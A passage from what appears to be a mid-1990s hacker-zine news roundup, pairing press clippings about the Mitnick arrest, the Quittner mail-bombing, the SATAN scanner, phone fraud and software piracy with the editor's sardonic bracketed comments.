  18085.   Fleming over the Internet by a "hacker" who got a job as a temp at BT
  18086.   and used their computers to gather the information.  (I heard that Fleming
  18087.   later admitted that "he" was actually the supposed "hacker.")
  18088.  
  18089.   This is news?  This is like saying, "Employees at Microsoft gained access to
  18090.   proprietary Microsoft source code," or "CAD Engineers at Ford gained
  18091.   access to super-secret Mustang designs."  Get real. ]
  18092.  
  18093. -------------------------------------------------------------------------------
  18094.  
  18095. Telecom admits security failings                                   Nov 29, 1994
  18096. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  18097. by Tim Kelsey (The Independent) p. 1
  18098.  
  18099. [ In typical British style, senior officials at BT attempted to save face
  18100.   by stating that sensitive information such as the file of Royal Family
  18101.   and Intelligence services phone numbers and addresses (currently floating
  18102.   around the Internet) was safe from prying eyes, but could indeed be accessed
  18103.   by BT employees.  Uh, yeah. ]
  18104.  
  18105. -------------------------------------------------------------------------------
  18106. Phreak Out!                                                            Dec 1994
  18107. ~~~~~~~~~~~
  18108. by Steve Gold (Internet and Comms Today) p. 44
  18109.  
  18110. [ A valiant attempt by England's Internet & Comms Today (my favorite
  18111.   Internet-related magazine--by far) to cover the Hack/Phreak scene
  18112.   in the UK, with a few tidbits about us here in the states.  Not
  18113.   100% accurate, but hell, it beats the living shit out of anything
  18114.   ever printed by any US mainstream mag. ]
  18115.  
  18116. -------------------------------------------------------------------------------
  18117.  
  18118. Hack To The Future                                                     Dec 1994
  18119. ~~~~~~~~~~~~~~~~~~
  18120. by Emily Benedek (Details) p. 52
  18121.  
  18122. Hacking Vegas                                                          Jan 1995
  18123. ~~~~~~~~~~~~~
  18124. by Damien Thorn (Nuts & Volts) p. 99
  18125.  
  18126. [ A review of HOPE, and a review of DefCon.  One from a techie magazine whose
  18127.   other articles included:  Build a Telephone Bug, Telephone Inside Wiring
  18128.   Maintenance, Boat GPS on Land and Sea and Killer Serial Communications;
  18129.   the other from a magazine that usually smells more fragrant than Vogue, and
  18130.   whose other articles included:  The Madonna Complex, Brother From Another
  18131.   Planet, Confessions of a Cyber-Lesbian and various fashion pictorials.
  18132.   One written by someone who has been in the hack scene since OSUNY ran on an
  18133.   Ohio-Scientific and the other written by a silly girlie who flitted around
  18134.   HOPE taking pictures of everyone with a polaroid.  You get the idea. ]
  18135.  
  18136. -------------------------------------------------------------------------------
  18137.  
  18138. Hackers Take Revenge on the Author of New Book on Cyberspace Wars  Dec  5, 1994
  18139. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  18140. by Jared Sandberg (The Wall Street Journal) p. B5
  18141.  
  18142. In his forthcoming book writer Joshua Quittner chronicles the bizarre but
  18143. true tale of a Hatfield-and-McCoys feud in the nether world of computer
  18144. hackers.
  18145.  
  18146. Now the hackers have extracted revenge for Mr. Quittner's attention, taking
  18147. control of his phone line and voice mail and bombarding his on-line account
  18148. with thousands of messages.
  18149.  
  18150. "I don't believe I've ever been hacked to this degree," says Mr. Quittner,
  18151. whose book, written with wife Michelle Slatalla, was excerpted in the
  18152. latest issue of Wired magazine, apparently prompting the attack.
  18153.  
  18154. "People in MOD and LOD are very unhappy about the story," Mr. Quittner says.
  18155. "That is what I believe prompted the whole thing."
  18156.  
  18157. -------------------------------------------------------------------------------
  18158.  
  18159. Terror On The Internet                                                 Dec 1994
  18160. ~~~~~~~~~~~~~~~~~~~~~~
  18161. By Philip Elmer-Dewitt (Time)
  18162.  
  18163. Thanksgiving weekend was quiet in the Long Island, New York, home of Michelle
  18164. Slatalla and Josh Quittner. Too quiet.
  18165.  
  18166. "We'd been hacked," says Quittner, who writes about computers, and
  18167. hackers, for the newspaper Newsday, and will start writing for TIME in
  18168. January. Not only had someone jammed his Internet mailbox with thousands of
  18169. unwanted pieces of E-mail, finally shutting down his Internet access
  18170. altogether, but the couple's telephone had been reprogrammed to forward
  18171. incoming calls to an out-of-state number, where friends and relatives heard
  18172. a recorded greeting laced with obscenities. "What's really strange," says
  18173. Quittner, "is that nobody who phoned, including my editor and my
  18174. mother, thought anything of it. They just left their messages and hung up."
  18175.  
  18176. It gets stranger. In order to send Quittner that mail bomb, the electronic
  18177. equivalent of dumping a truckload of garbage on a neighbor's front lawn,
  18178. someone, operating by remote control, had broken into computers at IBM,
  18179. Sprint and a small Internet service provider called the Pipeline, seized
  18180. command of the machines at the supervisory, or "root", level, and
  18181. installed a program that fired off E-mail messages every few seconds.
  18182.  
  18183. Adding intrigue to insult, the message turned out to be a manifesto that
  18184. railed against "capitalist pig" corporations and accused those companies
  18185. of turning the Internet into an "overflowing cesspool of greed." It was
  18186. signed by something called the Internet Liberation Front, and it ended like
  18187. this: "Just a friendly warning corporate America; we have already stolen
  18188. your proprietary source code. We have already pillaged your million dollar
  18189. research data. And if you would like to avoid financial ruin, get the
  18190. ((expletive deleted)) out of Dodge. Happy Thanksgiving Day turkeys."
  18191.  
  18192. It read like an Internet nightmare come true, a poison arrow designed to
  18193. strike fear in the heart of all the corporate information managers who had
  18194. hooked their companies up to the information superhighway only to discover
  18195. that they may have opened the gate to trespassers. Is the I.L.F. for real?
  18196. Is there really a terrorist group intent on bringing the world's largest
  18197. computer network to its knees?
  18198.  
  18199. That's what is so odd about the so-called Internet Liberation Front. While
  18200. it claims to hate the "big boys" of the telecommunications industry and
  18201. their dread firewalls, the group's targets include a pair of journalists and
  18202. a small, regional Internet provider. "It doesn't make any sense to me,"
  18203. says Gene Spafford, a computer-security expert at Purdue University.
  18204. "I'm more inclined to think it's a grudge against Josh Quittner."
  18205.  
  18206. That is probably what it was. Quittner and Slatalla had just finished a book
  18207. about the rivalry between a gang of computer hackers called the Masters
  18208. of Deception and their archenemies, the Legion of Doom, an excerpt of
  18209. which appears in the current issue of Wired magazine. And as it turns out,
  18210. Wired was mail-bombed the same day Quittner was, with some 3,000 copies
  18211. of the same nasty message from the I.L.F. Speculation on the Net at week's
  18212. end was that the attacks may have been the work of the Masters of Deception,
  18213. some of whom have actually served prison time for vandalizing the computers
  18214. and telephone systems of people who offend them.
  18215.  
  18216. -------------------------------------------------------------------------------
  18217.  
  18218. The Phreak Show                                                 Feb  5, 1995
  18219. ~~~~~~~~~~~~~~~
  18220. By G. Pascal Zachary (Mercury News)
  18221.  
  18222. "Masters of Deception" provides an important account of this hidden hacker
  18223. world. Though often invoked by the mass media, the arcana of hacking have
  18224. rarely been so deftly described as in this fast-paced book. Comprised of
  18225. precocious New York City high schoolers, the all-male "Masters of Deception"
  18226. (MOD) gang are the digital equivalent of the 1950s motorcyclists who roar
  18227. into an unsuspecting town and upset things for reasons they can't even explain.
  18228.  
  18229. At times funny and touching and other times pathetic and disturbing, the
  18230. portrait of MOD never quite reaches a crescendo. The authors, journalists
  18231. Michelle Slatalla of Newsday and Joshua Quittner of Time, fail to convey
  18232. the inner lives of the MOD. The tale, though narrated in the MOD's
  18233. inarticulate, super-cynical lingo and packed with their computer stunts,
  18234. doesn't convey a sense of what makes these talented oddballs tick.
  18235.  
  18236. Too often the authors fawn all over their heroes. In "Masters of Deception,"
  18237. every hacker is a carefree genius, benign and childlike, seeking only to
  18238. cavort happily in an electronic Garden of Eden, where there are no trespassing
  18239. prohibitions and where no one buys or sells information.
  18240.  
  18241. Come on. Phiber and phriends are neither criminals nor martyrs. The issue of
  18242. rights and responsibilities in cyberspace is a lot more complicated than
  18243. that. Rules and creativity can co-exist; so can freedom and privacy. If
  18244. that's so hard to accept, a full 25 years after the birth of the
  18245. Internet, maybe it's time to finally get rid of the image of the hacker
  18246. as noble savage. It just gets in the way.
  18247.  
  18248. -------------------------------------------------------------------------------
  18249.  
  18250. Hacking Out A Living                                               Dec  8, 1994
  18251. ~~~~~~~~~~~~~~~~~~~~
  18252. by Danny Bradbury (Computing) p. 30
  18253.  
  18254. There's nothing like getting it from the horse's mouth, and that's exactly
  18255. what IT business users, anxious about security, did when they went to a recent
  18256. conference given by ex-hacker, Chris Goggans.
  18257.  
  18258. [ Yeah, so it's a blatant-plug for me.  I'm the editor.  I can do that.
  18259.   (This was from one of the seminars I put on in Europe) ]
  18260.  
  18261. -------------------------------------------------------------------------------
  18262.  
  18263. Policing Cyberspace                                                Jan 23, 1995
  18264. ~~~~~~~~~~~~~~~~~~~
  18265. by Vic Sussman (US News & World Report) p. 54
  18266.  
  18267. [ Yet another of the ever-growing articles about high-tech cops.  Yes, those
  18268.   dashing upholder of law and order, who bravely put their very lives
  18269.   on the line to keep America free from teenagers using your calling card.
  18270.  
  18271.   Not that I wouldn't have much respect for our High-Tech-Crimefighters, if
  18272.   you could ever show me one.  Every High-Tech Crime Unit I've ever seen
  18273.   didn't have any high-tech skills at all...they just investigated low-tech
  18274.   crimes involving high-tech items (ie. theft of computers, chips, etc.)
  18275.   Not that this isn't big crime, its just not high tech.  Would they
  18276.   investigate the theft of my Nientendo?  If these self-styled cyber-cops
  18277.   were faced with a real problem, such as the theft of CAD files or illegal
  18278.   wire-transfers, they'd just move out of the way and let the Feds handle
  18279.   it.  Let's not kid ourselves. ]
  18280.  
  18281. -------------------------------------------------------------------------------
  18282.  
  18283. Hacker Homecoming                                                  Jan 23, 1995
  18284. ~~~~~~~~~~~~~~~~~
  18285. by Joshua Quitter (Newsweek) p. 61
  18286.  
  18287. The Return of the Guru                                             Jan 23, 1995
  18288. ~~~~~~~~~~~~~~~~~~~~~~
  18289. by Jennifer Tanaka and Adam Rogers (Time) p. 8
  18290.  
  18291. [ Two articles about Mark "Phiber Optik" Abene's homecoming party.
  18292.   Amazing.  Just a few years earlier, Comsec was (I think) the first
  18293.   group of hackers to make Time & Newsweek on the same date.
  18294.   Now, all someone has to do is get out of jail and they score a similar
  18295.   coup.  Fluff stories to fill unsold ad space. ]
  18296.  
  18297. -------------------------------------------------------------------------------
  18298.  
  18299. Data Network Is Found Open To New Threat                           Jan 23, 1995
  18300. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  18301. by John Markoff (New York Times) p. A1
  18302.  
  18303. A Federal computer security agency has discovered that unknown intruders
  18304. have developed a new way to break into computer systems, and the agency
  18305. plans on Monday to advise users how to guard against the problem.
  18306.  
  18307. The first known attack using the new technique took place on Dec. 25
  18308. against the computer of a well-known computer security expert at the
  18309. San Deigo Supercomputer Center.  An unknown individual or group took
  18310. over his computer for more then a day and electronically stole a large
  18311. number of security programs he had developed.
  18312.  
  18313. The flaw, which has been known as a theoretical possibility to computer
  18314. experts for more than a decade, but has never been demonstrated before,
  18315. is creating alarm among security experts now because of the series of
  18316. break-ins and attacks in recent weeks.
  18317.  
  18318. The weakness, which was previously reported in technical papers by
  18319. AT&T researchers, was detailed in a talk given by Tsutomo Shimomura,
  18320. a computer security expert at the San Deigo Supercomputer Center, at a
  18321. California computer security seminar sponsored by researchers at the
  18322. University of California at Davis two weeks ago.
  18323.  
  18324. Mr. Shimomura's computer was taken over by an unknown attacker who then
  18325. copied documents and programs to computers at the University of Rochester
  18326. where they were illegally hidden on school computers.
  18327.  
  18328. -------------------------------------------------------------------------------
  18329.  
  18330. A Most-Wanted Cyberthief Is Caught In His Own Web                  Feb 16, 1995
  18331. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  18332. by John Markoff (New York Times) p. A1
  18333.  
  18334. After a search of more than two years, a team of FBI agents early this
  18335. morning captured a 31-year-old computer expert accused of a long crime
  18336. spree that includes the theft of thousands of data files and at least
  18337. 20,000 credit card numbers from computer systems around the nation.
  18338.  
  18339. Federal officials say Mr. Mitnick's confidence in his hacking skills may
  18340. have been his undoing.  On Christmas Day, he broke into the home computer
  18341. of a computer security expert, Tsutomo Shimomura, a researcher at the
  18342. federally financed San Deigo Supercomputer Center.
  18343.  
  18344. Mr. Shimomura then made a crusade of tracking down the intruder, an obsession
  18345. that led to today's arrest.
  18346.  
  18347. It was Mr. Shimomura, working from a monitoring post in San Jose, California,
  18348. who determined last Saturday that Mr. Mitnick was operating through a computer
  18349. modem connected to a cellular telephone somewhere near Raleigh, N.C.
  18350.  
  18351. "He was a challenge for law enforcement, but in the end he was caught by his
  18352. own obsession," said Kathleen Cunningham, a deputy marshal for the United
  18353. States Marshals Service who has pursued Mr. Mitnick for several years.
  18354.  
  18355. -------------------------------------------------------------------------------
  18356.  
  18357. Computer Users Beware: Hackers Are Everywhere
  18358. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  18359. by Michelle V. Rafter (Reuters News Sources)
  18360.  
  18361. System Operators Regroup In Wake Of Hacker Arrest
  18362. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  18363. by Elizabeth Weise (AP News Sources)
  18364.  
  18365. Computer Hacker Seen As No Slacker
  18366. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  18367. by Paul Hefner (New York Times)
  18368.  
  18369. Kevin Mitnick's Digital Obsession
  18370. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  18371. by Josh Quittner (Time)
  18372.  
  18373. A Superhacker Meets His Match
  18374. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  18375. by Katie Hafner (Newsweek)
  18376.  
  18377. Cracks In The Net
  18378. ~~~~~~~~~~~~~~~~~
  18379. by Josh Quittner (Time)
  18380.  
  18381. Undetected Theft Of Credit-Card Data Raises Concern About Online Security
  18382. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  18383. by Jared Sandberg (The Wall Street Journal)
  18384.  
  18385. [Just a sampling of the scores of Mitnick articles that inundated the
  18386.  news media within hours of his arrest in North Carolina.  JUMP ON THE
  18387.  MITNICK BANDWAGON!  GET THEM COLUMN INCHES!  WOO WOO!]
  18388.  
  18389. -------------------------------------------------------------------------------
  18390.  
  18391. Hollywood Gets Into Cyberspace With Geek Movies
  18392. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  18393. By Therese Poletti (Reuters News Sources)
  18394.  
  18395. With dramatic tales like the capture last week of a shadowy computer hacker
  18396. wanted around the world, Hollywood studios are scrambling to cash in on
  18397. the growing interest in cyberspace.
  18398.  
  18399. "They are all looking at computer-related movies because computers are
  18400. hot," said Bishop Kheen, a Paul Kagan analyst. "They are all reviewing
  18401. scripts or have budgets for them. "We are going to see a rash of these
  18402. kinds of movies."
  18403.  
  18404. Experts say it remains to be seen what kind of box office draw can be
  18405. expected from techie movies such as one that might be based on the hunt for
  18406. Mitnick. But the recent surge of interest in the Internet, the high-profile
  18407. criminal cases, and romanticized images of hackers may fuel their popularity.
  18408.  
  18409. "I think it's a limited market, although given the media's insatiable
  18410. appetite for Internet hype, these movies might do well," said Kevin
  18411. Benjamin, analyst with Robertson Stephens.
  18412.  
  18413. TriStar Pictures and Columbia Pictures, both divisions of Sony Corp., are
  18414. developing movies based on technology or computer crime, executives said.
  18415.  
  18416. TriStar is working on a movie called "Johnny Mnemonic," based on a science
  18417. fiction story by William Gibson, about a futuristic high-tech "data courier"
  18418. with confidential information stored in a memory chip implanted in his head.
  18419.  
  18420. Sony also has plans for a CD-ROM game tied to the movie, also called
  18421. "Johnny Mnemonic," developed by Sony Imagesoft, a division of Sony
  18422. Electronic Publishing.
  18423.  
  18424. Columbia Pictures has a movie in development called "The Net," starring
  18425. Sandra Bullock, who played opposite Reeves in "Speed." Bullock plays a
  18426. reclusive systems analyst who accidentally taps into a classified program and
  18427. becomes involved in a murder plot. Sony Imagesoft has not yet decided whether
  18428. it will develop a CD-ROM game version of "The Net."
  18429.  
  18430. MGM/United Artists is said to be working on a movie called "Hackers,"
  18431. about a group of young computer buffs framed for a crime and trying to
  18432. protect their innocence. An MGM/UA spokeswoman did not return calls seeking
  18433. comment.
  18434.  
  18435. Disney is also said to be working on a movie called f2f, (face to face), about
  18436. a serial killer who tracks his victims on an online service. Disney also did
  18437. not return calls.
  18438.  
  18439. Bruce Fancher, once a member of the Legion of Doom hacker gang, worked as a
  18440. consultant for "Hackers." He said, much to his dismay, hackers are becoming
  18441. more popular and increasingly seen as romantic rebels against society.
  18442.  
  18443. "I've never met one that had political motivation. That is really something
  18444. projected on them by the mainstream media," Fancher said.
  18445.  
  18446. -------------------------------------------------------------------------------
  18447.  
  18448. Film, Multimedia Project In The Works On Hacker Kevin Mitnick      Mar  8, 1995
  18449. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  18450. By Greg Evans (Variety)
  18451.  
  18452. Miramax Films will produce a film and a multimedia project based on the
  18453. hunt for accused cyber felon Kevin Mitnick, the computer criminal who
  18454. captured the attention of the New York Times, the FBI and Hollywood.
  18455.  
  18456. Less than a month after Mitnick's capture made the front page of Feb. 16's
  18457. Times, Miramax has purchased the worldwide film and interactive rights to
  18458. the hacker's tale.
  18459.  
  18460. Rights were bought for an undisclosed amount from computer security expert
  18461. Tsutomu Shimomura, who led the two-year pursuit of Mitnick, and reporter
  18462. John Markoff, who penned the Times' article.
  18463.  
  18464. Markoff will turn his article into a book, which will be developed into a
  18465. script. "Catching Kevin: The Pursuit and Capture of America's Most Wanted
  18466. Computer Criminal" will be published later this year by Miramax's sister
  18467. company, Hyperion Books (both companies are owned by the Walt Disney Co.).
  18468.  
  18469. Miramax also plans to work with Shimomura to develop an interactive
  18470. project, most likely a CD-ROM, based on "Catching Kevin," according to
  18471. Scott Greenstein, Miramax's senior VP of motion pictures, music, new media
  18472. and publishing. He represented Miramax in the deal.
  18473.  
  18474. No director has been attached to the film project yet, although the company
  18475. is expected to make "Kevin" a high priority.
  18476.  
  18477. The story attracted considerable studio attention. In a statement, Shimomura
  18478. said he went with Miramax "based on their track record."
  18479.  
  18480. Shimomura and Markoff were repped by literary and software agent John Brockman
  18481. and Creative Artists Agency's Dan Adler and Sally Willcox.
  18482.  
  18483. -------------------------------------------------------------------------------
  18484.  
  18485. Hack-Happy Hollywood                                                   Mar 1995
  18486. ~~~~~~~~~~~~~~~~~~~~
  18487. (AP News Sources)
  18488.  
  18489. Not since the heyday of Freddy Krueger and Jason Voorhees has hacking been
  18490. so in demand in Hollywood.
  18491.  
  18492. Only this time, it's computer hackers, and the market is becoming glutted
  18493. with projects. In fact, many studio buyers were reluctant to go after the
  18494. screen rights to the story of computer expert Tsutomu Shimomura, who tracked
  18495. down the notorious cyber-felon Kevin Mitnick.
  18496.  
  18497. The rights were linked to a New York Times article by John Markoff, who's
  18498. turning the story into a book.
  18499.  
  18500. But Miramax wasn't daunted by any competing projects, and snapped up the
  18501. rights.
  18502.  
  18503. "We're talking about a ton of projects that all face the same dilemma: How
  18504. many compelling ways can you shoot a person typing on a computer terminal?"
  18505. said one buyer, who felt the swarm of projects in development could face
  18506. meltdown if the first few films malfunction.
  18507.  
  18508. The first test will come late summer when United Artists opens "Hackers,"
  18509. the Iain Softley-directed actioner about a gang of eggheads whose hacking
  18510. makes them prime suspects in a criminal conspiracy.
  18511.  
  18512. Columbia is currently in production on "The Net," with Sandra Bullock as
  18513. an agoraphobic computer expert who's placed in danger when she stumbles onto
  18514. secret files.
  18515.  
  18516. Touchstone has "The Last Hacker," which is closest in spirit to the Miramax
  18517. project. It's the story of hackmeister Kevin Lee Poulson, who faces a hundred
  18518. years in prison for national security breaches and was so skilled he disabled
  18519. the phones of KIIS-FM to be the 102nd (and Porsche-winning) caller. He was
  18520. also accused of disabling the phones of "Unsolved Mysteries" when he was
  18521. profiled.
  18522.  
  18523. Simpson/Bruckheimer is developing "f2f," about a serial killer who surfs
  18524. the Internet for victims.
  18525.  
  18526. Numerous other projects are in various stages of development, including
  18527. MGM's "The Undressing of Sophie Dean" and the Bregman/Baer project
  18528. "Phreaking," about a pair of hackers framed for a series of homicidal
  18529. computer stunts by a psychotic hacker.
  18530.  
  18531. -------------------------------------------------------------------------------
  18532.  
  18533. A Devil Of A Problem                                               Mar 21, 1995
  18534. ~~~~~~~~~~~~~~~~~~~~
  18535. by David Bank (Knight-Ridder)
  18536.  
  18537. Satan is coming to the Internet and might create havoc for computer networks
  18538. around the world.
  18539.  
  18540. The devilish software, due for release April 5, probes for hidden flaws
  18541. in computer networks that make them vulnerable to intruders.  The tool could
  18542. be used by mischievous pranksters or serious espionage agents to attack and
  18543. penetrate the computer networks of large corporations, small businesses or even
  18544. military and government installations.
  18545.  
  18546. None of the potential problems has swayed the authors of the program, Dan
  18547. Farmer, the "network security czar" of Silicon Graphics Inc. in Mountain
  18548. View, California, and Wietse Venema, his Dutch collaborator.
  18549.  
  18550. "Unfortunately, this is going to cause some serious damage to some people,"
  18551. said Farmer, who demonstrated the software this month in his San Francisco
  18552. apartment.  "I'm certainly advocating responsible use, but I'm not so
  18553. naive to think it won't be abused."
  18554.  
  18555. "It's an extremely dangerous tool," said Donn Parker, a veteran computer
  18556. security consultant with SRI International in Menlo Park, California.  "I
  18557. think we're on the verge of seeing the Internet completely wrecked in a sea
  18558. of information anarchy."
  18559.  
  18560. Parker advocates destroying every copy of Satan.  "It shouldn't even be
  18561. around on researcher's disks," he said.
  18562.  
  18563. -------------------------------------------------------------------------------
  18564.  
  18565. Satan Claims Its First Victim                                      Apr  7, 1995
  18566. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  18567. by Dwight Silverman (Houston Chronicle)
  18568.  
  18569. The cold hand of Satan knocked on the electronic door of Phoenix Data Systems
  18570. Wednesday night, forcing the Clear Lake-based Internet access provider to
  18571. temporarily shut down some computers.
  18572.  
  18573. "These guys can come in and literally take control, get super-user status on
  18574. our systems," said Bill Holbert, Phoenix's owner.  "This is not your
  18575. average piece of shareware."
  18576.  
  18577. The attack began about 9 p.m. Wednesday, he said.  Technicians watched for a
  18578. while and then turned off the machines at Phoenix that provide "shell"
  18579. accounts, which allow direct access to a computer's operating system.
  18580.  
  18581. The system was back up Thursday afternoon after some security modifications,
  18582. he said.
  18583.  
  18584. "It actually taught us a few things," Holbert said.  "I've begun to believe
  18585. that no computer network is secure."
  18586.  
  18587. -------------------------------------------------------------------------------
  18588.  
  18589. Fraud-free Phones                                                  Feb 13, 1995
  18590. ~~~~~~~~~~~~~~~~~
  18591. by Kirk Ladendorf (Austin American Statesman) p. D1
  18592.  
  18593. Texas Instruments' Austin-based Telecom Systems business came up with an
  18594. answer to cellular crime:  a voice-authorization service.
  18595.  
  18596. The technology, which TI showed off at the Wireless '95 Convention &
  18597. Exposition in New Orleans this month, was adapted from a service devised
  18598. for long-distance telephone companies, including Sprint.
  18599.  
  18600. TI says its voice-recognition systems can verify the identity of cellular
  18601. phone users by reading and comparing their "voice prints," the unique sound
  18602. patterns made by their speech.
  18603.  
  18604. The TI software uses a statistical technique called Hidden Markov Modeling
  18605. that determines the best option within a range of choices as it interprets a
  18606. voice sample.
  18607.  
  18608. If the verification is too strict, the system will reject bona fide users
  18609. when their voice patterns vary too much from the computer's comparison sample.
  18610. If the standard is too lenient, it might approve other users whose voice
  18611. patterns are similar to that of the authentic user.
  18612.  
  18613. The system is not foolproof, TI officials said, but beating it requires far
  18614. more time, effort, expense and electronics know-how than most cellular
  18615. pirates are willing to invest.
  18616.  
  18617. -------------------------------------------------------------------------------
  18618.  
  18619. Nynex Recommends Cellular Phone Customers Use A Password           Feb  9, 1995
  18620. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  18621. By Aaron Zitner (The Boston Globe)
  18622.  
  18623. Nynex Corp. is asking cellular telephone customers to dial an extra four
  18624. digits with each phone call in an attempt to foil thieves who steal an
  18625. estimated $1.3 million in cellular phone services nationwide each day.
  18626.  
  18627. Nynex Mobile Communications Co., has been "strongly recommending" since
  18628. November that all new customers adopt a four-digit personal identification
  18629. number, or PIN. This week, the company began asking all its customers to use
  18630. a PIN.
  18631.  
  18632. The Cellular Telecommunications Industry Association estimates that "phone
  18633. thieves" made $482 million in fraudulent calls last year, equal to 3.7
  18634. percent of the industry's total billings. Thieves can make calls and bill
  18635. them to other people by obtaining the regular 10-digit number assigned to a
  18636. person's cellular phone, as well as a longer electronic serial number that is
  18637. unique to each phone.
  18638.  
  18639. Thieves can snatch those numbers from the air using a specialized scanner,
  18640. said James Gerace, a spokesman for Nynex Mobile Communications. Even when no
  18641. calls are being made, cellular phones broadcast the two numbers every 30
  18642. seconds or so to notify the cellular system in case of incoming calls, he said.
  18643.  
  18644. When customers adopt a PIN, their phone cannot be billed for fraudulent calls
  18645. unless the thieves also know the PIN, Gerace said. He said the phone broadcasts
  18646. the PIN at a different frequency than the phone's electronic serial number,
  18647. making it hard for thieves to steal both numbers with a scanner.
  18648.  
  18649. Gerace also noted that customers who become victims of fraud despite
  18650. using a PIN can merely choose a new number. Victims who do not use a PIN
  18651. must change their phone number, which requires a visit to a cellular phone
  18652. store to have the phone reprogrammed, he said.
  18653.  
  18654. [ Uh, wait a second.  Would you use touch-tone to enter this PIN?  Woah.
  18655.   Now that's secure.  I've been decoding touch-tone by ear since 1986.
  18656.   What a solution!  Way to go NYNEX! ]
  18657.  
  18658. -------------------------------------------------------------------------------
  18659.  
  18660. Kemper National Insurance Offers PBX Fraud                         Feb  3, 1995
  18661. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  18662. (Knight-Ridder News Sources)
  18663.  
  18664. Kemper National Insurance Cos. now offers inland marine insurance
  18665. coverage to protect Private Branch Exchange (PBX) systems against toll fraud.
  18666.  
  18667. "Traditional business equipment policies companies buy to protect their PBX
  18668. telephone systems do not cover fraud," a Kemper spokesman said.
  18669. The Kemper policy covers both the equipment and the calls made illegally
  18670. through the equipment.
  18671.  
  18672. The coverage is for the PBX equipment, loss of business income from missed
  18673. orders while the PBX system is down, and coverage against calls run up on
  18674. an insured's phone systems. The toll fraud coverage is an option to the PBX
  18675. package.
  18676.  
  18677. -------------------------------------------------------------------------------
  18678.  
  18679. New Jersey Teen To Pay $25,000 To Microsoft, Novell              Feb  6, 1995
  18680. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  18681. The Wall Street Journal
  18682.  
  18683. Microsoft Corp. and Novell Inc. reached a court-approved settlement with
  18684. a New Jersey teenager they accused of operating a computer bulletin board
  18685. that illegally distributed free copies of their copyrighted software programs.
  18686.  
  18687. Equipped with a court order, employees of the two companies and federal
  18688. marshals raided the young man's house in August, seizing his computer
  18689. equipment and shutting down an operation called the Deadbeat Bulletin Board.
  18690. Under the settlement announced Friday, the teenager agreed to pay $25,000 to
  18691. the companies and forfeit the seized computer equipment. In return, the
  18692. companies agreed to drop a copyright infringement lawsuit brought against
  18693. him in federal court in New Jersey, and keep his identity a secret.
  18694.  
  18695. Redmond-based Microsoft and Novell, Provo, Utah, opted to take action against
  18696. the New Jersey man under civil copyright infringement laws rather than pursue
  18697. a criminal case. The teenager had been charging a fee to users of the Deadbeat
  18698. Bulletin Board, which was one reason the companies sought a cash payment, a
  18699. Novell spokesperson said. The two software producers previously settled a
  18700. similar case in Minneapolis, when they also seized the operator's equipment
  18701. and obtained an undisclosed cash payment.
  18702.  
  18703. "About 50 groups are out there engaging in piracy and hacking," said Edward
  18704. Morin, manager of Novell's antipiracy program. He said they operate with
  18705. monikers such as Dream Team and Pirates With Attitude.
  18706.  
  18707. -------------------------------------------------------------------------------
  18708.  
  18709. Software Piracy Still A Big Problem In China                       Mar  6, 1995
  18710. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  18711. By Jeffrey Parker (Reuters News Sources)
  18712.  
  18713.  
  18714. Sales of pirated software have reached a fever pitch in Beijing in the week
  18715. since U.S. and Chinese officials defused a trade war with a broad accord to
  18716. crush such intellectual property violations.
  18717.  
  18718. In the teeming "hacker markets" of the Zhongguancun computer district near
  18719. Beijing University, there were few signs of any clampdown Monday, the sixth
  18720. day of a "special enforcement period" mandated by the Feb. 26 Sino-U.S. pact.
  18721.  
  18722. "The police came and posted a sign at the door saying software piracy is
  18723. illegal," said a man selling compact disk readers at bustling Zhongguancun
  18724. Electronics World.
  18725.  
  18726. "But look around you. There's obviously a lot of profit in piracy," he said.
  18727.  
  18728. A score of the market's nearly 200 stalls openly sell compact disks loaded
  18729. with illegal copies of market-leading desktop software titles, mostly the
  18730. works of U.S. firms.
  18731.  
  18732. Cloudy Sky Software Data Exchange Center offers a "super value" CD-ROM for
  18733. 188 yuan ($22) that brims with 650 megabytes of software from Microsoft,
  18734. Lotus and other U.S. giants whose retail value is about $20,000, nearly
  18735. 1,000 times higher.
  18736.  
  18737.  
  18738. -------------------------------------------------------------------------------
  18739.  
  18740. Internet Story Causes Trouble                                      Feb  7, 1995
  18741. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  18742. (AP News Sources)
  18743.  
  18744. The University of Michigan has refused to reinstate a sophomore suspended
  18745. last week after he published on the Internet a graphic rape and torture
  18746. fantasy about a fellow student.
  18747.  
  18748. The student's attorney told The Detroit News on Monday that the
  18749. university is waiting until after a formal hearing to decide if the
  18750. 20-year-old student is a danger to the community. A closed hearing
  18751. before a university administrator is scheduled for Thursday.
  18752.  
  18753. "Our position is that this is a pure speech matter," said Ann
  18754. Arbor attorney David Cahill. "He doesn't know the girl and has
  18755. never approached her. He is not dangerous. ... He just went off
  18756. half-cocked."
  18757.  
  18758. The Jan. 9 story was titled with the female student's last name
  18759. and detailed her torture, rape and murder while gagged and tied to
  18760. a chair.
  18761.  
  18762. The student also may face federal charges, said FBI Special
  18763. Agent Gregory Stejskal in Ann Arbor. Congress recently added
  18764. computer trafficking to anti-pornography laws.
  18765.  
